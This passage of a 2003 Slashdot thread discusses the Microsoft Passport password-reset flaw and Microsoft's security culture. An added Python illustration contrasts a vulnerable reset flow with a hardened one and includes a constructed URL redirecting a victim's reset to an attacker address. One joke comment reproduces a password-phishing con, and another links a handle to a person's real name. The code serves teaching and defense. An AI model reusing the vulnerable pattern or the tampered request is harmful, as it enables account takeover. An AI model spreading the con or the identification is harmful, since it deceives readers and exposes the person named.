    When I attempted to contact Microsoft about the problem, they asked me for a credit card number. When I explained I didn't want support and was trying to report a bug, I was transferred to someone else who... asked me for a credit card number. Wash, rinse, repeat.

    --
    What part of "shall not be infringed" is so hard to understand?
  43. Re:FUD by gazbo · · Score: 2, Interesting

    If you read the news article, it says that although he sent several emails, not one was sent to security@microsoft.com - the advertised place to send them.

    He sent them to, amongst others, abuse@hotmail.com. This is the place that they will get mails from everyone complaining about a spammer etc - it's like receiving the wrong order from Amazon and sending an email to hostmaster@amazon.com, then flaming them for taking so long to respond.

  44. MS announcement by fudgefactor7 · · Score: 2, Informative

    Passport Security Issue. MS was listening, Muhammad Faisal Rauf was just too impatient. Probably just wanted credit as being "kewl," or something.

    1. Re:MS announcement by tazan · · Score: 2

      Wrong. They only responded to him posting the exploit, not to the original emails.

    2. Re:MS announcement by merchant_x · · Score: 2, Insightful

      So what's the correct address to report bugs to Microsoft? As you can see from this thread of posts several slashdotters are in the dark about this.
      http://slashdot.org/comments.pl?sid=63519&cid=5909258
      Please enlighten us.

  45. Re:FUD by mulhall · · Score: 2, Funny

    You seem to be under the impression that legitimate users actually change their passwords - what planet are you living on?!

  46. Re:FUD by Exedore · · Score: 4, Funny

    Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
    Me: Thanks. How did you fix them?
    Mechanic: We removed the brakes entirely
    Me: What the...
    Mechanic: That will be $567.98, please.

    --

    I take drugs seriously.

  47. Re:Oh my God (MS explains it all..) by jkrise · · Score: 4, Funny

    It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).

    Of course, this means that Full Control of user accounts is needed. The process of manually checking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport .Net will be re-activated.

    This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.

    --
    If you keep throwing chairs, one day you'll break windows....
  48. Another Hotmail Password Hack found on Kazaa by doublem · · Score: 5, Funny

    Hotmail password hacker.doc

    THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD

    Step 1:
    send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line

    Step 2: The email body
    In the first line: put the complete email address of the user whose password you want.

    In the 5th line, type the email address and the login (pass) you want the password sent to,
    here is an example:

    To: Robot_pass_finder@hotmail.com
    Subject: PW: fetchpass
    CC.________________ BCC.___________________
    =-email body-=

    address@hotmail.com

    your email address here example.: myemail@hotmail.com
    your pass here example.: mypassword

    --
    "Live Free or Die." Don't like it? Then keep out of the USA
  49. The problem with global accounts like Passport by Jugalator · · Score: 2, Funny

    One Company to rule them all
    One Hacker to find them
    One Exploit to bring them all
    to the attacker's power

    --
    Beware: In C++, your friends can see your privates!
  50. My company used incrementing session keys. by Moderation+abuser · · Score: 2, Interesting

    On a web page which managed HR information, so you could log in, check the session key in the URL and then simply scan through nearby numbers to find and update all sorts of things about other logged in people.

    'Twas a highly expensive piece of software as well...

    --
    Government of the people, by corporate executives, for corporate profits.
  51. Re:FUD by IDIIAMOTS · · Score: 2, Informative

    As of 6:30AM 5/8/2003 password reset ability works on passport.com.

    For non-Hotmail e-mail addresses there exists an option to receive change instructions by e-mail. The URL that's generated on those pages is similar to the one in the exploit, yet entering "attacker" address other than "victim" address doesn't result in an e-mail sent. If the two addresses in the URL match that on the account the e-mail appears to be sent.

    Looks like they indeed patched, although there shouldn't be two addresses in the URL or, even better, they shouldn't be passing them in the URL at all.

  52. his name is probably by abhisarda · · Score: 4, Informative

    Robert Babcock.

    Do a search for Ashyukun on Google (www.nhmk.com/nes/).

    also at

    (http://216.239.33.104/search?q=cache:q1XY1gcmAYAC:www.animemusicvideos.org/members/linkprobview.php%3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=en&ie=UTF-8).

    Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?

  53. I have to go with the crowd here.... by AlphaSys · · Score: 5, Interesting

    I usually stand up for the Redmond boys if there's some bashing going on and not a lot of balance to the issue. But this is just an incredibly stupid hole to have open. Why would you ever, ever, ever pass details in the URL string that the user himself need not (and should not be allowed to) supply? If it is because you are passing it among servers in some fancy-schmancy web service scheme, then at least have the decency to hide the exploitable name/value pair in an HTTP header or something (but even this should not be necessary for what they are doing, even if my guess as to how their backend works is wayyy off base). Somebody said it earlier in the discussion that it is because developers (using the term lightly) add features without thinking of how to do it right and how to do it securely and just pass any old thing in the URL string, and they were right on the mark.

    Some coders (again using the term loosely) at my organization used to do this absolutely all the time and I would bitch about how piss poor it was from a security angle (and regularly demonstrate how easy it was to circumvent the intended "security" mechanisms). Everybody laughed at me when I did... that is until one of our largest customers hired an outside firm to audit the "security" of the apps they were getting. It took the firm very little time to discover these nuggets, of course. It is interesting to note that they reported that the application security was among the poorest they had seen, but that the server configurations (my department) were among the tightest. The sad thing is the stupid customer basically thought the two canceled each other out, threw some extra money at redesigning the application to meet the standards it should have to begin with, rewarded our systems team which had done it right the first time with absolutely squat, and renewed the contract for another five years. Shows you how much the corporate world understands what's really going on.

    --
    Can I bum a sig? I left mine at the office.
    1. Re:I have to go with the crowd here.... by MS_is_the_best · · Score: 2, Interesting

      I read your post, because I thought to have the same opinion: Microsoft software can have obscure exploits, just like every other (also open source) program, but this is really WAY too stupid. How can something this important to your company be SO easily exploitable?

      But I answer because your security idea of web apps is also very terrifying. Security through obscurity does not work! (Passing variables in headers is no security, and choosing weird names is bad coding practice and not more secure.) The proper way is to put in the URL what you need (?page_nr=3) and keep at the server the stuff that is only used after proper authentication. Perhaps at a very unknown website obscurity would delay the script kiddies a bit, but I think hackers are really too motivated to hack Passport to not try something other than IE (telnet passport.microsoft.com 80?).

      But I'm glad you are a system administrator who knows how to secure his/her machines, those people are also too rare ....
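    The point made in the last few posts (IDIIAMOTS's note that the reset URL should not carry two addresses, and this exchange about keeping server-side data out of the URL) as an added illustration, not Passport's code or anything posted in this thread: the reset flow the thread describes, where the destination address comes from the URL, beside a hardened flow that ignores any client-supplied destination and mails a random, single-use, expiring token to the address on the account record. Every account, address, URL and outbox here is constructed for the demo; the endpoint name, parameter names and 15-minute token lifetime are assumptions.

```python
"""Added example (not Passport's code): a reset endpoint that trusts a
client-supplied destination, beside a hardened version that derives the
destination from the stored account and uses a random, single-use token.
All accounts, addresses and URLs below are constructed."""
import secrets
import time
from urllib.parse import parse_qs, urlsplit

TOKEN_TTL = 15 * 60  # seconds a reset token stays valid (assumed policy)

# Constructed account store: address -> record. A real service would use a DB.
ACCOUNTS = {"victim@example.com": {"password": "hunter2"}}
# Constructed outbox standing in for the mail sender, so callers can see
# where a reset message would have gone.
OUTBOX = []
# Outstanding reset tokens: token -> (account address, expiry time).
TOKENS = {}


def _param(url, name):
    """First value of a query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def reset_request_vulnerable(url):
    """The pattern the thread complains about: `em` names the account and
    `prefem` names where the reset link goes, both trusted straight from
    the URL, so nothing ties the destination to the account."""
    account = _param(url, "em")
    if account not in ACCOUNTS:
        return 404
    OUTBOX.append({"to": _param(url, "prefem"), "account": account})
    return 200


def reset_request_hardened(url):
    """Hardened form: the only client input is the account address; the
    destination comes from the stored record, and the link carries an
    unguessable token rather than the addresses themselves."""
    account = _param(url, "em")
    record = ACCOUNTS.get(account)
    # Same status either way, so the endpoint does not reveal which
    # addresses have accounts.
    if record is None:
        return 200
    token = secrets.token_urlsafe(32)
    TOKENS[token] = (account, time.time() + TOKEN_TTL)
    OUTBOX.append({"to": account, "token": token})
    return 200


def reset_confirm(token, new_password, now=None):
    """Second step: the token from the mail is single use and expires."""
    now = time.time() if now is None else now
    entry = TOKENS.pop(token, None)  # pop makes the token single use
    if entry is None:
        return False
    account, expiry = entry
    if now > expiry:
        return False
    ACCOUNTS[account]["password"] = new_password
    return True


def names_foreign_destination(url):
    """Log check: does a reset request carry a destination address that
    differs from the account address? After a fix such requests should be
    rare and are worth alerting on."""
    account = _param(url, "em").lower()
    destination = _param(url, "prefem").lower()
    return bool(destination) and destination != account


if __name__ == "__main__":
    # Constructed request shaped like the one quoted in the thread.
    req = ("https://reset.example.test/emailpwdreset.srf?lc=1033"
           "&em=victim@example.com&prefem=attacker@example.net&rst=1")
    reset_request_vulnerable(req)
    print("vulnerable flow mails:", OUTBOX[-1]["to"])
    reset_request_hardened(req)
    print("hardened flow mails:", OUTBOX[-1]["to"])
    print("flagged by log check:", names_foreign_destination(req))
```

The same random-token discipline answers the incrementing-session-key story earlier in the thread: an identifier a client can guess or count up to is not a credential.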

  54. Probably Microsoft code is difficult to maintain. by Futurepower(R) · · Score: 4, Interesting

    After months of trying to understand Microsoft's situation (Windows XP Shows the Direction Microsoft is Going), I came to the conclusion that the Microsoft management style leads to mountains of sloppy code that is difficult to maintain. That's the only theory that seems to fit. For example, in the Internet Explorer browser alone, there have been for years more serious security bugs than Microsoft fixed. There are, at present, 14 security vulnerabilities.

    Here is the recent record. The list of defects has been similar for years. Also, this is a record only of security defects, not all defects:
    • June 18, 2002: 18 vulnerabilities
    • August 8, 2002: 22 vulnerabilities
    • September 9, 2002: 19 vulnerabilities
    • November 19, 2002: 32 vulnerabilities
    • December 9, 2002: 19 vulnerabilities. (Microsoft fixed 15 on Nov. 20, but two new ones were found.)
    • May 8, 2003: 14 vulnerabilities
    This is a terrible record for a company that has $52.9 billion in the bank. (See "Total Current Assets" in the upper left hand corner, which is the money available within the next few months. It takes time to spend a billion dollars, so the next few months is equivalent to cash.)

    Obviously, Microsoft could fix the bugs if the company wanted to fix them. But the company apparently lacks the will to devote the resources necessary (IE still does not have tabbed browsing), and apparently also, it is not easy.
  55. How do I close a .Net Passport account? by bblackfrog · · Score: 2, Interesting

    This may be a naive question, but how do I go about closing a .Net Passport account? I want Microsoft to remove all of my personal information from their servers.

    There seems to be no way to do this online. A call to MS customer service resulted in an "I dunno, I can't do that." answer.

    btw, I'm not dumb enough to actively participate in Passport. I bought something online last summer from a small company, and after completing the purchase, I was shocked to see that Microsoft was handling the transaction with Passport. Damn it! Now they have my credit card info, shipping address, etc. Guess I should have read the fine print before I clicked Submit...

    Anyone successfully done this?

  56. Re:FUD by N3WBI3 · · Score: 2, Insightful

    So if I am an ISP and I have a hole in my service, is unplugging the server a fix?? That is basically what they did. Now it's the right thing to do (make sure nobody can change **until** you have it fixed)..

    --
  57. *Sigh* by White+Roses · · Score: 2, Funny

    The unfortunate thing is that I don't know anyone who is both (a) stupid enough to use Hotmail and (b) grotesquely stupid enough to store personal information in Passport.

    I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.

    But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).

    --
    Do not touch -Willie
  58. YES Re:How do I close a .Net Passport account? by redwoodtree · · Score: 2, Informative

    Yes, in fact if you log in and go to your profile, there's a link in the bottom left hand nav that says "CLOSE .NET PASSPORT ACCOUNT"

    You click on that, agree to their terms and close your account right there in three clicks.

    Good luck

  59. Re:FUD by ymgve · · Score: 2

    Does the word 'damage control' mean anything to you?

    404ing the page took them 2 minutes, and now all users are relatively secure again. If Microsoft had done nothing while they fixed the bug, several million Hotmail accounts would still be vulnerable, and would probably stay that way for at least a few hours.

  60. MS problem is their own culture and codebase by Genus+Marmota · · Score: 5, Interesting

    I don't mean to bash MS (there are so many on /. that do it so well) but realistically these kinds of security problems are very unlikely to stop happening. If you've worked there as a dev, even if only for a few months, you probably have a good idea why this is. It's not because people are uncaring or incompetent. The big obstacles are 1) their own history and culture and 2) the enormity of their codebase. Here's why I think so.

    If you've made any study of it at all you know that effective security results from a process that starts before the software is even written. There is no protocol that will save you from logic errors (like the latest Passport hole). To do this requires a good understanding by the devs of security and their adherence to design principles and coding practices. To do that you need a software development methodology that enforces the consistent application of those principles and practices. Therein lies the problem.

    In my little corner of MS (though by all accounts it was typical of the company as a whole) what was prized above all was meeting requirements and deadlines. Virtually no energy was put into the development environment (hence the hour I spent every morning just downloading the nightly build, the insane .bat scripts, constantly fixing my own NT install as a $55/hr contractor). Nobody got "c-hours" for making life easier. More importantly, there was little value placed on design, good technique. Lip service was paid in meetings and reviews, of course, and superficial style details received obsessive scrutiny. Code reviews often bogged down on correct Hungarian notation but a unit test consisting of "return true" was perfectly ok. The "heroes" were people with big brain muscles who spent nights and weekends hammering out code to meet the latest deadline.

    The result of all this was a coding culture that I called the kingdom of cut-and-paste. I was actually encouraged to write routines by starting with someone else's routine to do something unrelated and edit it to do my task. A colleague would stand over my shoulder browsing the codebase looking for something convenient to steal. It was a shock to realize how little code people actually wrote. This is one of the things that I hated about working there, that I spent so much of my time fscking with the various APIs, incomprehensible include file hierarchies and so little time writing C++.

    Well, in my Intro to Fortran class in '77 the prof explained why massive code duplication is a bad idea, and the results are visible in every MS product. You can't fix a bug in one place, you have to fix it every place it got copied to, and you don't know where those are. The codebase is now on the order of 100'sM lines or better? Probably not even MS has a good handle on this, because they can't know for sure how much duplication (with tiny variations) there is (clue: lots).

    Once a company grows to a considerable size it's really hard to change the culture. I've seen this at several startups. MS is like a battleship or an aircraft carrier. High-tech and deadly but turning that boat around is really hard and simply may not happen in a short distance. Expecting them to change their performance WRT security in a few months (or year) is kind of like expecting the old Soviet apparatchiks to start respecting civil liberties and human dignity because the Central Committee sends out a memo. Good luck. It's a city unto itself in Redmond, its own little world. And even if you did, what the hell are you going to do about the millions of lines of (largely incomprehensible) code in the installed base? The millions of systems in the wild that are unpatched and unmaintained?

    I see many of the same disasters being recapitulated in .NET. They may talk security and I'm sure they're trying hard but I expect that their long term strategies are going to rely more on legislation than the (probably impossible) task of bringing their products t

  61. culture of security by aphor · · Score: 2, Interesting

    A: You're way off about changing people's approach. The sad fact is people like that are in pain-avoidance mode. Give them pain. Give them a productive way to avoid the pain. There must be code review. One guy does a little coding, another guy has to sign off on it. A third has to sign off that it has been tested (whether or not any testing actually happens is not important). All three get burned if anything bad happens: after-hours or weekend work to fix it NOW? The rate of code churn goes down, and the quality goes up. Grumbling goes up, but it sounds like a personal problem to me... :)

    B: You're dead-on-target about doing other people's work. You can't have individual effort and collective accountability. You have to have collective work and collective accountability. Oh, and if you're smarter than others: the sharpest knife always gets used the most. Adjust to it. One day you will be enlightened.

    C: You are dead-on-target about the financial sector :). That does not mean it won't work in hospitals or law offices though. It just means *somebody* has to fulfill the role of irate customer when the slackers need it.

    Culture is not something you create at the water cooler or in seminars. It is dictated by the unique combination of supply and demand wherever you are. You can change the supply (of people or other resources), or the demand. The boss/team-leader mediates customer demand and needs to have some real power over the programmers in the same way that customers have real power to affect the company's bottom line. If you lack accountability, that isn't a software development problem. You're just going to get shoddy results, software security, housekeeping, everything included.

    The moral of the story: accountability is security. So, if you want a culture of security, improve your accountability! It has positive potential for Maslow's "self-actualizer" types too.

    --
    --- Nothing clever here: move along now...